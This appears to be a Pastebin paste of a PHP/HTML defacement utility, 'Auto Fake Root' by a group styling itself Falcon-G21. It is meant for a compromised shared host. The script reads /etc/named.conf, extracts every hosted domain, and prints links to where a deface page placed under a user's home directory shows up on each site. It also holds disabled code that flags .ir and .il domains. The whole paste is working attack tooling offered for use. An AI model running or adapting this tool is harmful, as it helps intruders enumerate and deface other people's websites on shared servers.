Falcon-G21

Auto Fake Root V1

Nov 10th, 2015
323
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.74 KB | None | 0 0
  1. <html>
  2. <title>Closed by Falcon-G21</title>
  3. <head>
  4. <meta charset="utf-8">
  5. <link rel="SHORTCUT ICON" href="http://anas-tav.blogspot.com/favicon.ico">
  6. <meta property="og:keywords" content="Falcon-G21, Falcon-G21 Team Dark, Aihara Anwaru, Hacking, Deface, Zone-DB, Zone-H"/>
  7. <meta name="google-site-verification" content="c3TrhimarnRGTIKtlr38L_eM4BfT60vRS9XklBruFvI" />
  8. <meta property="og:title" content="Closed by Falcon-G21"/>
  9. <meta property="og:description" content="#Silent to be Better"/>
  10. <meta property="og:locale" content="id_ID"/>
  11. <meta property="og:locale:alternate" content="en_US" />
  12. <meta http-equiv='Content-Type' content='text/html; charset=windows-1252' />
  13. <meta name='googlebot' content='index,follow' />
  14. <meta name='robots' content='all' />
  15. <meta name='robots schedule' content='auto' />
  16. <meta name='distribution' content='global' />
  17. <meta name='author' content='Aihara Anwaru' />
  18. <meta name="geo.placename" content="Indonesia"/>
  19. <meta name="robots" content="index, follow"/>
  20. <meta name="viewport" content="width=device-width, initial-scale=1"/>
  21.  
  22. <link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
  23. <style type="text/css">
  24. body { background-color:transparan;background:#000;background-image: url("http://fc08.deviantart.net/fs71/i/2013/140/0/b/red_forest_background_by_komtess_narbenherz-d65wyaz.jpg");background-position: center; background-size:100%; background-attachment: fixed;background-repeat: repeat;
  25. }
  26. a {
  27. text-decoration:none;
  28. color:#aaaaaa;
  29. }
  30. a:hover {
  31. text-decoration:none;
  32. color:red;
  33. }
  34. </style>
  35. </head>
  36. <body>
  37. <br>
  38. <center>
  39. <font size="8" face="Iceland" style="color: #00FF00;text-shadow: 0px 1px 7px green;">Auto Fake Root by Falcon-G21</font><br>
  40. </center>
  41. <center>
  42. <form action="" method="post">
  43. <input type="text" placeholder="username" name="uname">
  44. <input type="text" placeholder="file deface name" name="file" size="20">
  45. <input type="submit" name="x" value="run">
  46. </form><br>
  47. <?php
  48. @set_time_limit(0);
  49. if(isset($_POST['x'])){
  50. $user = $_POST['uname'];
  51. $deface = $_POST['file'];
  52. $rx4 = @file('/etc/named.conf');
  53. if(!$rx4)
  54. {
  55. die (" can't read /etc/named.conf");
  56. }
  57. else
  58. {
  59. foreach($rx4 as $rx5){
  60. if(eregi('zone',$rx5)){
  61. preg_match_all('#zone "(.*)"#',$rx5,$rx6);
  62. flush();
  63. if(strlen(trim($rx6[1][0])) >2){
  64. $rx7 = posix_getpwuid(@fileowner('/etc/valiases/'.$rx6[1][0]));
  65. $rx8 = $rx7['name'] ;
  66. $rx8 = $rx6[1][0];
  67. $rx9 = '\.ir';
  68. $rx10 = '\.il';
  69. if (eregi("$rx9",$rx6[1][0]) or eregi("$rx10",$rx6[1][0]) )
  70. {
  71. //$rx8 = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$rx6[1][0].'</div>';
  72. }
  73. echo "<font face='Iceland' size=4 style='color: #00FF00;text-shadow: 0px 1px 7px #0D8D0D;'>http://$rx8/~$user/$deface </font><br />";
  74. flush();
  75. }
  76. }
  77. }
  78. }
  79. }
  80. ?>
Advertisement
Add Comment
Please, Sign In to add comment